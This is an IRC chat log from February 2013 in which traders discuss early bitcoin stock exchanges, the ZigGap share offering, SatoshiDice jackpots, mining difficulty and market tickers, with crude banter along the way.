up before march Feb 24 21:14:10 From first trade, to last trade, 57minutes to sell 10mil shares for a total of 500btc. Feb 24 21:16:36 gh not th? Feb 24 21:18:06 sry Feb 24 21:18:43 4670.82 GHs currently Feb 24 21:19:14 I believe friedcat noted theyd get to 12TH before March Feb 24 21:21:16 ;;estimate Feb 24 21:21:16 so far the interesting thing is that no ones posted any of the shares for sale Feb 24 21:21:17 Next difficulty estimate | 4286596.47932 based on data since last change | 4322543.11086 based on data for last three days Feb 24 21:21:19 even at a higher price Feb 24 21:21:35 thats good then Feb 24 21:21:56 it's a 20% dividend being waved in our faces Feb 24 21:22:13 ThickAsThieves: Told you I had some interesting things upcoming for BF. Feb 24 21:22:19 And this.. is just the tip of the iceberg ;) Feb 24 21:22:25 glad to see it Feb 24 21:22:32 I have another 4 major assets coming soon Feb 24 21:22:38 just asset wise Feb 24 21:22:47 also glad that I learned to keep BTC handy on all the PTs for stuff like this Feb 24 21:23:05 i caught sdice at .0044 Feb 24 21:23:07 I like ziggap as an asset, esp with the btc market going up. the more BTC sales and the market pushes up, the more earnings ziggap will make Feb 24 21:23:36 Missed ZigGap IPO? CoinBr.MPBPT-O still open (ask closes in 2 hours) on bitfunder :) Feb 24 21:24:13 i'm still deciding whther to grab your IDIFFAPR ;) Feb 24 21:25:01 lol and i'm going to throw in discounted MPBPT-E April in, too Feb 24 21:27:22 [MPEX] [S.MPOE] 1800 @ 0.00062294 = 1.1213 BTC [+] Feb 24 21:34:08 someone put up a 1.2mil buy @ 0.00006 https://bitfunder.com/asset/ZigGap Incase anyone wants to make a quick 20% profit. lol Feb 24 21:36:51 CoinBr.MPBPT-E April opened now ;) Feb 24 21:47:01 [MPEX] [S.MPOE] 922 @ 0.00062294 = 0.5744 BTC [+] Feb 24 21:47:03 [MPEX] [S.MPOE] 4321 @ 0.00062295 = 2.6918 BTC [+] Feb 24 21:47:07 [MPEX] [S.MPOE] 8272 @ 0.00062321 = 5.1552 BTC [+] Feb 24 21:47:09 [MPEX] [S.MPOE] 15594 @ 0.00062322 = 9.7185 BTC [+] Feb 24 21:48:07 [MPEX] [S.MPOE] 8451 @ 0.00062322 = 5.2668 BTC [+] Feb 24 21:48:09 [MPEX] [S.MPOE] 8375 @ 0.00062344 = 5.2213 BTC [+] Feb 24 21:49:12 6btc shy of hitting 800btc vol today Feb 24 21:49:21 [BTCTC] [GSDPT] 72 @ 0.006 = 0.432 BTC [+] Feb 24 21:49:23 [BTCTC] [GSDPT] 28 @ 0.006 = 0.168 BTC [+] Feb 24 21:51:14 Ukto if you weren't so stubborn you wouldn't have to go "another 100k sold" manually you know. Feb 24 21:51:24 lol Feb 24 21:51:25 its fun :P Feb 24 21:51:36 k lol Feb 24 21:51:44 besides.. *points @ api* Feb 24 21:51:50 hm ? Feb 24 21:52:01 api's been in closed beta for a while Feb 24 21:52:11 meen making small adjustments to it every day or two Feb 24 21:52:33 several ppl signed up for access Feb 24 21:52:49 i still don't see your trades in here. Feb 24 21:52:59 although I now really need to focus on the "Big Thing"(tm) for BitFunder Feb 24 21:53:04 want to make sure its live by the end of the month Feb 24 21:53:16 once that is done I will push on all the small stuff Feb 24 21:53:23 jus' sayin'. Feb 24 21:53:35 I know. Appreciated. :) Feb 24 21:53:44 although, its kind of interesting.. Feb 24 21:53:55 even outsize of ziggap, todays been a high vol day Feb 24 21:53:59 even though its a Sunday Feb 24 21:56:30 vol on sdice on BF seems so low to me, considering how many shares Feb 24 21:56:48 maybe only owned by a few people mostly... Feb 24 21:57:15 most ppl who bought them on BF en bulk that I have talked to, dont want to sell Feb 24 21:57:32 i know the owners of at least 700k shares Feb 24 21:57:40 and all agree its worth holding onto for long periods Feb 24 21:57:50 and didnt buy the shares to day trade them Feb 24 22:01:45 no profit for sdice today, someone won the "less than 1" Feb 24 22:01:56 .02BTC = 1279 BTC Feb 24 22:03:18 0,o Feb 24 22:03:22 wish it was me Feb 24 22:03:23 lOL Feb 24 22:03:40 thats one hell of a win Feb 24 22:03:45 it's a letdown for profit, but might be a good pr thing fopr sdice Feb 24 22:03:49 bet someone was jumping for joy Feb 24 22:03:58 lol wow. Feb 24 22:03:59 some 33,000 usd Feb 24 22:04:12 "I jsut won a new car from satoshi dice!" Feb 24 22:04:17 yep Feb 24 22:04:20 ya srsly, bet two quarters, take home 35k Feb 24 22:04:30 evoor, spin that shit! Feb 24 22:06:40 http://www.youtube.com/watch?v=JUx7kWrpQD Feb 24 22:06:49 a bitcoin to whoever tells me what's going on in that vid. Feb 24 22:06:58 This video does not exist. Feb 24 22:07:03 1btc to me pls Feb 24 22:07:15 http://www.youtube.com/watch?v=JUx7kWrpQDs Feb 24 22:07:17 missed an s Feb 24 22:07:21 i dont care Feb 24 22:07:28 i did my job! Feb 24 22:07:39 fu. you're banned from this contest nao! Feb 24 22:07:55 scam! Feb 24 22:08:14 totally! Feb 24 22:09:20 nigga stole my bike? Feb 24 22:09:40 scaring the shit outta some sneaky kid? Feb 24 22:09:55 i think dub gets it. Feb 24 22:10:19 kid allegedly triedf to steal a bike, got scared straight (allegedly) Feb 24 22:10:21 got an addy ? Feb 24 22:10:26 nah Feb 24 22:10:31 donate it to the foundation :) Feb 24 22:11:04 (I actually don't have an addy because bitcoin sucks) Feb 24 22:11:19 mp, if you are romanian, why do you have such american dialect? Feb 24 22:11:42 ThickAsThieves because im not speaking french. if i were you'd wonder why am i from paris. Feb 24 22:12:06 yep that went over my head Feb 24 22:12:18 i dont mean why do you speak english Feb 24 22:12:26 why do you speak english? Feb 24 22:12:34 but if i do speak english, why'd you expect me to speak it different from how it's spoken ? Feb 24 22:12:45 cause you're not gangsta enough mircea_popescu Feb 24 22:12:50 that also. Feb 24 22:12:52 u ain't talk lik dis Feb 24 22:13:05 wuz craccn mah homies Feb 24 22:13:16 craccn ?! Feb 24 22:13:23 i guess usually foreigners inject some detectable phrasing that isnt "american" Feb 24 22:13:23 crackin' Feb 24 22:13:42 but i must underestimate how easy it is to "get it" Feb 24 22:13:51 i feel like our language is fucked up Feb 24 22:14:01 all languages are fucked up Feb 24 22:14:09 mircea_popescu: what do you tihnk of this ziggap business? Feb 24 22:14:26 what do you mean what do i think ? Feb 24 22:14:30 I think its the number one way to exchange USD for bitcoins Feb 24 22:14:35 whcih is why I've never heard of it Feb 24 22:14:37 We're not an exchange. Feb 24 22:14:47 lol that worked. Feb 24 22:14:50 you might want to edit your post then Feb 24 22:14:55 Are you allowed to list on a BTC exchange? Feb 24 22:15:01 since thats what it says Feb 24 22:15:03 Show me? Feb 24 22:15:13 [MPEX] [S.DICE] 540 @ 0.0062 = 3.348 BTC [-] Feb 24 22:15:19 should be "to purchase bitcoins for cash" Feb 24 22:15:22 not exchange Feb 24 22:15:25 if the word was used somewhere Feb 24 22:15:27 it shouldnt have been Feb 24 22:15:30 Direct sales != echange Feb 24 22:15:32 but techncially its the same thing Feb 24 22:15:41 still, calling yourself number one when you in fact don't exist Feb 24 22:15:48 Who said number 1? Feb 24 22:15:49 [MPEX] [S.DICE] 20 @ 0.0062 = 0.124 BTC [-] Feb 24 22:15:58 ZigGap stands on top as the most trusted method for converting USD cash directly to BTC Feb 24 22:16:10 dub: its true.. Feb 24 22:16:12 On the top in what way? Feb 24 22:16:20 there is only one other company Feb 24 22:16:24 that does what ziggap does Feb 24 22:16:26 aethero: https://bitcointalk.org/index.php?topic=146611.0 Feb 24 22:16:31 besides, its an opinion Feb 24 22:16:32 not fact. Feb 24 22:16:34 i thought that's what the death and taxes guy did Feb 24 22:17:11 Our company is dedicated to the furtherance of what bitcoin will soon become. Feb 24 22:17:12 as i said, its just an opinion. not worth kicking anyone over ;) Feb 24 22:17:15 english motherfuckers Feb 24 22:17:19 spaek it Feb 24 22:17:23 dub: dont be so hateful lol. Feb 24 22:17:31 i du spaek et ful. Feb 24 22:17:34 don't post retarded waffle Feb 24 22:17:39 but that could use some better wording Feb 24 22:17:49 [MPEX] [S.MPOE] 7654 @ 0.00062343 = 4.7717 BTC [-] Feb 24 22:17:59 actually, that line could just deleted aethero Feb 24 22:18:05 serves no real purpose I think Feb 24 22:18:17 mircea_popescu DeathAndTaxes is primarily focused on: https://fastcash4bitcoins.com/ Feb 24 22:18:30 jurov: is there an easy way to get average price for positions? Feb 24 22:18:46 mjr__ in coinbr? Feb 24 22:18:50 thestringpuller iirc there were two sister sites or no ? Feb 24 22:18:55 yeah Feb 24 22:19:10 I think he "closed them" or thinks of em as less priority? Feb 24 22:19:20 oh is it ? Feb 24 22:19:31 um, no... one has to copy the table to spreadsheet Feb 24 22:19:40 yeah, that's how i'm doing it now Feb 24 22:19:48 but it is hard to split up into categories Feb 24 22:21:06 unless there is a quicker way that i don't know Feb 24 22:21:32 autofilter (on transaction type), average Feb 24 22:21:35 (32 - 29) / 32 Feb 24 22:21:44 ;;calc (32 - 29) / 32 Feb 24 22:21:44 0.09375 Feb 24 22:21:59 but would be nice to have it in coinbr, i see Feb 24 22:22:25 if shes hot, I wouldnt mind paying for different positions. :P Feb 24 22:22:37 needs to be clean tho. Feb 24 22:22:52 mircea_popescu: You got the hookups in Romania, right? ;) Feb 24 22:23:12 yes dood. i got all the hookups in romania. locked in my basement. Feb 24 22:23:21 with my beers in romania and any and all bears. Feb 24 22:23:24 lol Feb 24 22:23:26 :D Feb 24 22:24:09 ah, i haven't used the autofilter, i was just using sort Feb 24 22:24:17 that would actually make it relatively simple Feb 24 22:24:22 Ukto: :) Feb 24 22:24:26 [MPEX] [S.MPOE] 4321 @ 0.00062036 = 2.6806 BTC [-] Feb 24 22:24:28 [MPEX] [S.MPOE] 8179 @ 0.00062001 = 5.0711 BTC [-] Feb 24 22:24:42 [HAVELOCK] [SDICE] 1 @ 0.687 BTC [+] Feb 24 22:24:51 that's really important market indicator, average price of positions Feb 24 22:24:53 ;;ticker Feb 24 22:24:53 BTCUSD ticker | Best bid: 29.55001, Best ask: 29.77800, Bid-ask spread: 0.22799, Last trade: 29.55000, 24 hour volume: 28470.05925074, 24 hour low: 28.93969, 24 hour high: 30.39877, 24 hour vwap: 29.74696 Feb 24 22:27:42 [HAVELOCK] [SDICE] 6 @ 0.688 = 4.128 BTC [+] Feb 24 22:28:18 jurov namworld was sorta starting to do something about it earlier Feb 24 22:28:25 course he ran into algebraic trouble :D Feb 24 22:28:28 haha mp cheap mobile home in your country Feb 24 22:29:05 http://polimedia.us/dtng/c/src/136173632847.gif isn't that a nice house. Feb 24 22:29:06 but still a huge WIN for 0.50$ !! Feb 24 22:29:15 [BTCTC] [S.MPOE-PT] 100 @ 0.00065 = 0.065 BTC [-] Feb 24 22:29:36 error4733 http://www.mhbay.com/ Feb 24 22:29:38 why ? Feb 24 22:29:45 50€ house lol Feb 24 22:30:15 yes, i saw namworld's spreadsheet, clearly not finished yet Feb 24 22:31:23 wow cheap... cable include ? u need FOX if you stay in a mobile home Feb 24 22:31:42 [HAVELOCK] [SDICE] 10 @ 0.689 = 6.89 BTC [+] Feb 24 22:32:17 fox doesn't have free satellite broadcast? Feb 24 22:32:37 i hope not Feb 24 22:32:37 jurov http://pastebin.com/NbLimjFj Feb 24 22:32:39 that's the convo Feb 24 22:33:11 i case some alien get the signal Feb 24 22:33:45 mircea i know, i came later and just skipped it, seemed too painful Feb 24 22:33:54 worst thing broadcasted ever :/ Feb 24 22:34:21 lol Feb 24 22:35:40 "you update the faq so much" lol Feb 24 22:36:05 totally. Feb 24 22:36:38 hey, anyone know when glbse actually started ? Feb 24 22:38:01 by the way mp, i really like the per share that you list now Feb 24 22:38:30 mjr__ ty! sometimes the needed improvements are hidden in plain sight Feb 24 22:39:01 [MPEX] [S.MPOE] 7777 @ 0.00062312 = 4.846 BTC [+] Feb 24 22:39:06 [MPEX] [S.MPOE] 4321 @ 0.00062313 = 2.6925 BTC [+] Feb 24 22:39:08 [MPEX] [S.MPOE] 3112 @ 0.00062343 = 1.9401 BTC [+] Feb 24 22:39:13 [MPEX] [S.MPOE] 3663 @ 0.00062344 = 2.2837 BTC [+] Feb 24 22:39:22 mircea_popescu: https://bitcointalk.org/index.php?topic=5457.0 Feb 24 22:39:58 with some fun thrown it...AlpacaStocks lol Feb 24 22:40:03 so wait! Feb 24 22:40:11 born april 2011, dead august 2012 ? Feb 24 22:40:14 like a year and a half total ? Feb 24 22:40:25 yes like that Feb 24 22:40:36 mmmkay. Feb 24 22:40:55 can't believe they paid 20 btc for someone to come up with "glbse" as a good name Feb 24 22:41:47 lol Feb 24 22:41:54 and yeah, it's the little things :) Feb 24 22:42:05 i like being able to notice the changes you amke Feb 24 22:42:06 make Feb 24 22:42:10 official announcement https://bitcointalk.org/index.php?topic=5947.0 Feb 24 22:42:29 ty jurov Feb 24 22:43:06 mircea_popescu , you stopped posting bondholders lists with requested interest? Feb 24 22:43:11 https://www.youtube.com/watch?feature=player_embedded&v=pp89tTDxXuI Feb 24 22:43:22 this is so cool Feb 24 22:43:43 think about mitigating any gravity related risk of injury Feb 24 22:44:11 plane falling out of sky? eject passengers and swarm of these to catch them Feb 24 22:44:59 jurov no ? Feb 24 22:45:23 dub that'd be almost as cool as bitocins Feb 24 22:45:43 no? where are they? in mpoe report is only final mpbor, not the other lower rates Feb 24 22:46:14 a, that was always the case. Feb 24 22:46:27 you see addresses and sums up to the final Feb 24 22:47:58 http://trilema.com/2012/mpoe-rezultate-aprilie-2012/#comment-82627 there is one listed with 4.975% Feb 24 22:48:17 i thought that was cause he asked for less Feb 24 22:48:19 what's a mobile home? Feb 24 22:51:28 jurov a yes, i used to reprint old ones, but once people got the ability to change their interest rates it became impractical. Feb 24 22:51:36 you're right tho, it wasn't "always" the case. Feb 24 22:52:15 FabianB: "manufactured ousing" Feb 24 22:52:33 [MPEX] [S.MPOE] 7450 @ 0.00062004 = 4.6193 BTC [-] Feb 24 22:52:46 i wanted to see data... cuz i was trolled on forum a bit when i said "interesting the rate ended up the same as i announced for MPBPT" Feb 24 22:52:54 [BTCTC] [BTC-BOND] 5 @ 0.01 = 0.05 BTC [+] Feb 24 22:53:18 pigeons: ah, not in the sense today in NY tomorrow in LA Feb 24 22:53:37 https://bitcointalk.org/index.php?topic=131270.msg1554156#msg1554156 Feb 24 22:53:39 FabianB i think it's those transformed busses/trucks Feb 24 22:54:10 over here those are "motor homes" (rv's) Feb 24 22:54:23 manufactured housing is called mobile homes here Feb 24 22:55:30 cause it wasnt asbuilt on the lot it was assembled and brought there Feb 24 22:55:35 [MPEX] [S.MPOE] 1186 @ 0.00062004 = 0.7354 BTC [-] Feb 24 22:55:37 [MPEX] [S.MPOE] 4321 @ 0.00062003 = 2.6791 BTC [-] Feb 24 22:55:47 [MPEX] [S.MPOE] 7777 @ 0.00062002 = 4.8219 BTC [-] Feb 24 22:55:49 [MPEX] [S.MPOE] 2587 @ 0.00062001 = 1.604 BTC [-] Feb 24 22:55:50 [MPEX] [S.MPOE] 5090 @ 0.00062 = 3.1558 BTC [-] Feb 24 22:55:52 [MPEX] [S.MPOE] 8089 @ 0.00061986 = 5.014 BTC [-] Feb 24 22:57:54 o i c Feb 24 23:02:28 [BTCTC] [BTC-GOLD] 20 @ 0.0218 = 0.436 BTC [-] Feb 24 23:03:15 [BTCTC] [BASIC-MINING] 1 @ 0.349 BTC [-] Feb 24 23:05:31 [MPEX] [S.MPOE] 2458 @ 0.00062333 = 1.5321 BTC [+] Feb 24 23:05:33 [MPEX] [S.MPOE] 4321 @ 0.00062334 = 2.6935 BTC [+] Feb 24 23:05:38 [MPEX] [S.MPOE] 8636 @ 0.00062343 = 5.3839 BTC [+] Feb 24 23:05:40 [MPEX] [S.MPOE] 20019 @ 0.00062344 = 12.4806 BTC [+] Feb 24 23:05:44 [MPEX] [S.MPOE] 5350 @ 0.00062463 = 3.3418 BTC [+] Feb 24 23:05:46 [MPEX] [S.MPOE] 8869 @ 0.00062737 = 5.5641 BTC [+] Feb 24 23:05:47 [MPEX] [S.MPOE] 21900 @ 0.00062785 = 13.7499 BTC [+] Feb 24 23:05:50 [MPEX] [S.MPOE] 7950 @ 0.00062949 = 5.0044 BTC [+] Feb 24 23:05:52 [MPEX] [S.MPOE] 2900 @ 0.00063218 = 1.8333 BTC [+] Feb 24 23:05:54 [MPEX] [S.MPOE] 17597 @ 0.00063336 = 11.1452 BTC [+] Feb 24 23:06:19 kakobrekla: how much would you sell me price data for? Feb 24 23:06:46 !ticker m X.IDIFF.MAR Feb 24 23:06:47 [MPEX:X.IDIFF.MAR] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.07595 / 0.07595 / 0.07595 (25 shares, 1.90 BTC), 30D: 0.0429 / 0.06613044 / 0.089 (363 shares, 24.01 BTC) Feb 24 23:07:48 ;;bc,stats Feb 24 23:07:50 Current Blocks: 222916 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 859 blocks | Next Difficulty In About: 5 days, 9 hours, 39 minutes, and 37 seconds | Next Difficulty Estimate: 4287733.20605 | Estimated Percent Change: 17.43959 Feb 24 23:08:02 ;;estimate Feb 24 23:08:03 Next difficulty estimate | 4287733.20605 based on data since last change | 4324634.0572 based on data for last three days Feb 24 23:08:57 ;;ticker Feb 24 23:08:58 BTCUSD ticker | Best bid: 29.64002, Best ask: 29.78260, Bid-ask spread: 0.14258, Last trade: 29.78399, 24 hour volume: 27744.43316417, 24 hour low: 29.12001, 24 hour high: 30.39877, 24 hour vwap: 29.77251 Feb 24 23:09:03 ;;asks 30 Feb 24 23:09:05 There are currently 1698.3492 bitcoins offered at or under 30.0 USD, worth 50824.8847514 USD in total. Feb 24 23:09:24 ;;bids 29 Feb 24 23:09:25 There are currently 1866.1768 bitcoins demanded at or over 29.0 USD, worth 54305.1474477 USD in total. Feb 24 23:09:58 ;;bids 29.50 Feb 24 23:10:00 [MPEX] [S.MPOE] 4321 @ 0.00062066 = 2.6819 BTC [-] Feb 24 23:10:02 There are currently 36.722034 bitcoins demanded at or over 29.5 USD, worth 1086.11120359 USD in total. Feb 24 23:10:04 [MPEX] [S.MPOE] 2458 @ 0.00062048 = 1.5251 BTC [-] Feb 24 23:10:05 thestringpuller, theres only a few days of data there, its more about the stream Feb 24 23:10:05 [MPEX] [S.MPOE] 9950 @ 0.00062047 = 6.1737 BTC [-] Feb 24 23:17:52 [MPEX] [S.MPOE] 15263 @ 0.00061986 = 9.4609 BTC [-] Feb 24 23:18:08 thestringpuller, i have more than month ;D Feb 24 23:18:19 do me offer Feb 24 23:18:42 do him! Feb 24 23:19:24 oh yeah, jurov, when i got mpoe dividends it listed a positive fee... Feb 24 23:19:43 was curious what that was exactly Feb 24 23:20:14 it's fix for rounding error... gosh. i thought i had hirren it properly Feb 24 23:20:36 lol Feb 24 23:20:52 but anyway, it's there to make sure you got dividends exaclty to last satoshi ;) Feb 24 23:20:58 [MPEX] [S.MPOE] 5842 @ 0.00062023 = 3.6234 BTC [+] Feb 24 23:21:36 not like these passthrough scammers Feb 24 23:21:43 [BTCTC] [SYNERGY] 1 @ 0.11979 BTC [-] Feb 24 23:22:27 [BTCTC] [SYNERGY] 12 @ 0.1198 = 1.4376 BTC [+] Feb 24 23:29:16 lmao Feb 24 23:33:14 lol thanks jurov Feb 24 23:33:33 i really have nothing but good things to say about coinbr Feb 24 23:33:56 [MPEX] [S.MPOE] 10860 @ 0.00062965 = 6.838 BTC [+] Feb 24 23:33:58 [MPEX] [S.MPOE] 9199 @ 0.00062964 = 5.7921 BTC [-] Feb 24 23:35:30 only if i had ukto's zeal about developing it faster... Feb 24 23:35:53 coinbr is nice. :) Feb 24 23:36:54 wait, you have an acct, too? Feb 24 23:37:42 [HAVELOCK] [SDICE] 3 @ 0.689 = 2.067 BTC [+] Feb 24 23:37:43 [HAVELOCK] [SDICE] 12 @ 0.689 = 8.268 BTC [+] Feb 24 23:38:42 [HAVELOCK] [SDICE] 3 @ 0.69 = 2.07 BTC [+] Feb 24 23:39:01 jurov: I am all over the place Feb 24 23:40:45 yeah, but how many MHs does it get? http://www.theverge.com/2013/2/24/4023898/nvidia-phoenix-superphone-hands-on-video Feb 24 23:42:21 Ukto are you using boilerplate? Feb 24 23:42:28 no Feb 24 23:43:01 what frontend is that Feb 24 23:43:11 ThickAsThieves: but will it blend? Feb 24 23:43:18 obv Feb 24 23:43:29 bootstrap? Feb 24 23:44:14 [MPEX] [S.MPOE] 8150 @ 0.00062964 = 5.1316 BTC [-] Feb 24 23:46:17 [BTCTC] [BASIC-MINING] 19 @ 0.3498 = 6.6462 BTC [+] Feb 24 23:46:19 [BTCTC] [BASIC-MINING] 1 @ 0.35 BTC [+] Feb 24 23:51:11 bootstrap. Feb 25 00:05:39 Congrats on getting Ziggap Ukto Feb 25 00:05:56 thanks. :) Feb 25 00:06:19 It provides competition to the great Popescu Feb 25 00:06:31 now.. once the large biz's launch theirs, it will get interesting ;) Feb 25 00:07:28 ukto is gonna IPO mtgox Feb 25 00:07:33 [BTCTC] [ESECURITYSABTC] 1 @ 0.58 BTC [-] Feb 25 00:07:35 pfft Feb 25 00:07:35 [BTCTC] [ESECURITYSABTC] 1 @ 0.56796 BTC [-] Feb 25 00:07:37 [BTCTC] [ESECURITYSABTC] 6 @ 0.5 = 3 BTC [-] Feb 25 00:08:23 more seriously, do you have a posted process for vetting new assets? Feb 25 00:08:55 Submit a ticket with details. Feb 25 00:08:59 And then I open a discussion :) Feb 25 00:09:17 I have turned down a great many assets. Feb 25 00:10:28 Ukto..um but the Biz27B-6 garage guys, really... Feb 25 00:10:55 can't you just hide them from the list? Feb 25 00:11:25 if they want to choose investors themselves Feb 25 00:11:54 you will soon be able to hide them on your own Feb 25 00:11:58 I know who they are Feb 25 00:12:04 and what they represent. Feb 25 00:12:12 I told them, not listing the info publically would be hurtful Feb 25 00:12:32 lol, ignore for assets... do it like btctalk, with link becoming red :D Feb 25 00:12:41 hehe Feb 25 00:14:41 wait... Feb 25 00:14:52 Ukto are you doing ziggap or bitfunder? Feb 25 00:15:13 BitFunder Feb 25 00:15:16 aethero is ziggap Feb 25 00:15:26 what happened to btc pantry? Feb 25 00:15:33 cool Feb 25 00:15:45 aethero lol Feb 25 00:18:18 its one of the up coming assets Feb 25 00:18:58 you can trade in 10000 shares for a cupcake at any time Feb 25 00:19:05 hmm Feb 25 00:19:09 sounds yummy Feb 25 00:19:14 where do I signup Feb 25 00:19:51 some scam website called bitfunder Feb 25 00:19:57 ouch Feb 25 00:20:19 well, at least the proof of owning the shares is available :P Feb 25 00:20:27 then I can demand my cupcake later Feb 25 00:21:05 can i exchange back cupcakes for shares ? Feb 25 00:21:22 as long as they are not stale, and you did not give them the aids. Feb 25 00:22:36 meow Feb 25 00:23:58 Im part of the ziggap team Feb 25 00:24:01 I am not ziggap Feb 25 00:25:57 [MPEX] [S.MPOE] 13400 @ 0.00063322 = 8.4851 BTC [+] Feb 25 00:26:39 there you go Feb 25 00:30:03 ;;ticker Feb 25 00:30:04 BTCUSD ticker | Best bid: 29.68183, Best ask: 29.77000, Bid-ask spread: 0.08817, Last trade: 29.77000, 24 hour volume: 26032.29631832, 24 hour low: 29.20123, 24 hour high: 30.39877, 24 hour vwap: 29.78388 Feb 25 00:32:23 bfl took down their shoutbox Feb 25 00:32:24 lol Feb 25 00:32:31 nvm it sback up Feb 25 00:32:36 . Feb 25 00:32:56 aethero: how to pronounce it? zig gap? zigg APP? zzggpp? Feb 25 00:33:07 Zig app Feb 25 00:34:01 지갑 when in english is jigab which when spoken by a non native english speaker sounds like jhig-ap. Feb 25 00:34:09 Zig app. Feb 25 00:34:16 aethero when will you guys be hiring? Feb 25 00:34:32 Most likely soon. Feb 25 00:34:42 it depends on how the second release goes Feb 25 00:34:45 i wanna intern! ooh ooh pick me Feb 25 00:34:55 :) Feb 25 00:35:11 remember to take off every zig Feb 25 00:36:17 I havent thought about all your base in so long Feb 25 00:36:53 you should integrate 'For great justice' into your marketing somehow Feb 25 00:36:57 . Feb 25 00:37:23 yes, sorry Feb 25 00:37:59 [MPEX] [S.DICE] 5000 @ 0.0062 = 31 BTC [-] Feb 25 00:38:42 [HAVELOCK] [SDICE] 2 @ 0.641 = 1.282 BTC [-] Feb 25 00:38:44 [HAVELOCK] [SDICE] 7 @ 0.6325 = 4.4275 BTC [-] Feb 25 00:38:45 [HAVELOCK] [SDICE] 15 @ 0.63 = 9.45 BTC [-] Feb 25 00:38:46 [HAVELOCK] [SDICE] 3 @ 0.628 = 1.884 BTC [-] Feb 25 00:38:47 [HAVELOCK] [SDICE] 23 @ 0.62411 = 14.3545 BTC [-] Feb 25 00:38:56 I'm creating a time machine company Feb 25 00:38:58 can I IPO? Feb 25 00:40:26 Time machine for what? Feb 25 00:40:43 For sending stuff backward and forward in time duuuh Feb 25 00:44:56 but then you'll have to compete with the iWatch Feb 25 00:45:08 [MPEX] [S.MPOE] 9900 @ 0.00063322 = 6.2689 BTC [+] Feb 25 00:46:16 [MPEX] [S.DICE] 348 @ 0.006 = 2.088 BTC [-] Feb 25 00:46:18 [MPEX] [S.DICE] 1055 @ 0.00599999 = 6.33 BTC [-] Feb 25 00:56:23 [MPEX] [S.BBET] 1 @ 0.00196487 BTC [-] Feb 25 01:02:00 [MPEX] [S.DICE] 2000 @ 0.00578774 = 11.5755 BTC [-] Feb 25 01:11:51 [MPEX] [S.MPOE] 6300 @ 0.00063181 = 3.9804 BTC [-] Feb 25 01:12:49 [MPEX] [S.MPOE] 4321 @ 0.00063235 = 2.7324 BTC [+] Feb 25 01:12:51 [MPEX] [S.MPOE] 15279 @ 0.00063265 = 9.6663 BTC [+] Feb 25 01:15:44 [MPEX] [S.MPOE] 4321 @ 0.00063255 = 2.7332 BTC [-] Feb 25 01:15:55 [MPEX] [S.MPOE] 6929 @ 0.00063265 = 4.3836 BTC [+] Feb 25 01:24:36 someone won less than 1 Feb 25 01:24:38 Damn Feb 25 01:24:47 http://www.satoshidice.com/full.php?tx=a874d43fb31c3a0785a6828006136c6d3a3cb79c3c19fe4c7caf770f42c6a3c7 Feb 25 01:24:50 crazy shit Feb 25 01:25:55 what again ?! Feb 25 01:26:28 bet 0.02 BTC Feb 25 01:26:36 gets back 1000+ BTC Feb 25 01:26:57 a a yes. Feb 25 01:27:53 lol win Feb 25 01:28:25 be funny if they bet 0.1 BTC Feb 25 01:28:26 lol Feb 25 01:31:07 [MPEX] [S.MPOE] 4321 @ 0.00063197 = 2.7307 BTC [-] Feb 25 01:31:09 [MPEX] [S.MPOE] 11800 @ 0.00063181 = 7.4554 BTC [-] Feb 25 01:31:11 [MPEX] [S.MPOE] 12079 @ 0.00063034 = 7.6139 BTC [-] Feb 25 01:31:22 .01max bet Feb 25 01:31:34 nope Feb 25 01:31:36 nvm Feb 25 01:34:48 it was 0.1 befor Feb 25 01:34:53 erik needs to capitalize on this Feb 25 01:34:58 to attract more gamblers Feb 25 01:35:02 ;;ticker Feb 25 01:35:03 BTCUSD ticker | Best bid: 29.85899, Best ask: 29.87306, Bid-ask spread: 0.01407, Last trade: 29.87306, 24 hour volume: 24287.24988202, 24 hour low: 29.20123, 24 hour high: 30.39877, 24 hour vwap: 29.78080 Feb 25 01:35:16 wait Feb 25 01:35:20 its 0.1 max lol Feb 25 01:35:41 [MPEX] [S.MPOE] 10860 @ 0.00063335 = 6.8782 BTC [+] Feb 25 01:35:43 [MPEX] [S.MPOE] 2603 @ 0.00063336 = 1.6486 BTC [+] Feb 25 01:37:03 asciilifeform http://www.loper-os.org/?p=1108&cpage=1#comment-5152 i lolled. Feb 25 01:38:11 [MPEX] [S.MPOE] 350 @ 0.00063336 = 0.2217 BTC [+] Feb 25 01:38:12 [MPEX] [S.MPOE] 13900 @ 0.00063347 = 8.8052 BTC [+] Feb 25 01:41:32 [MPEX] [S.DICE] 115 @ 0.00578774 = 0.6656 BTC [-] Feb 25 01:42:09 [MPEX] [S.DICE] 390 @ 0.00596019 = 2.3245 BTC [+] Feb 25 01:49:20 [MPEX] [S.MPOE] 3350 @ 0.00063347 = 2.1221 BTC [+] Feb 25 01:49:22 [MPEX] [S.MPOE] 14550 @ 0.00063413 = 9.2266 BTC [+] Feb 25 01:56:14 [MPEX] [S.MPOE] 321 @ 0.00063034 = 0.2023 BTC [-] Feb 25 01:56:16 [MPEX] [S.MPOE] 1339 @ 0.00062964 = 0.8431 BTC [-] Feb 25 02:04:42 [HAVELOCK] [HIM] 1 @ 14.95 BTC [+] Feb 25 02:05:41 [HAVELOCK] [HIM] 1 @ 14.99 BTC [+] Feb 25 02:07:42 [HAVELOCK] [HIM] 1 @ 15 BTC [+] Feb 25 02:11:29 [MPEX] [S.MPOE] 15650 @ 0.00062524 = 9.785 BTC [-] Feb 25 02:15:42 [MPEX] [S.MPOE] 1898 @ 0.00061986 = 1.1765 BTC [-] Feb 25 02:15:44 [MPEX] [S.MPOE] 4321 @ 0.00061939 = 2.6764 BTC [-] Feb 25 02:15:50 [MPEX] [S.MPOE] 231 @ 0.00061938 = 0.1431 BTC [-] Feb 25 02:20:34 [MPEX] [S.MPOE] 4321 @ 0.00062499 = 2.7006 BTC [+] Feb 25 02:20:36 [MPEX] [S.MPOE] 10340 @ 0.00062524 = 6.465 BTC [+] Feb 25 02:20:42 [MPEX] [S.MPOE] 19050 @ 0.00062975 = 11.9967 BTC [+] Feb 25 02:24:18 [MPEX] [S.DICE] 38 @ 0.00596019 = 0.2265 BTC [+] Feb 25 02:24:42 [HAVELOCK] [SDICE] 10 @ 0.694 = 6.94 BTC [+] Feb 25 02:30:32 Ah, fuck that, why are people adopting BitFunder? =/ Feb 25 02:31:04 [MPEX] [S.MPOE] 4321 @ 0.00063101 = 2.7266 BTC [+] Feb 25 02:31:06 [MPEX] [S.MPOE] 18296 @ 0.00063091 = 11.5431 BTC [-] Feb 25 02:32:48 its got no 30 btc registering fee 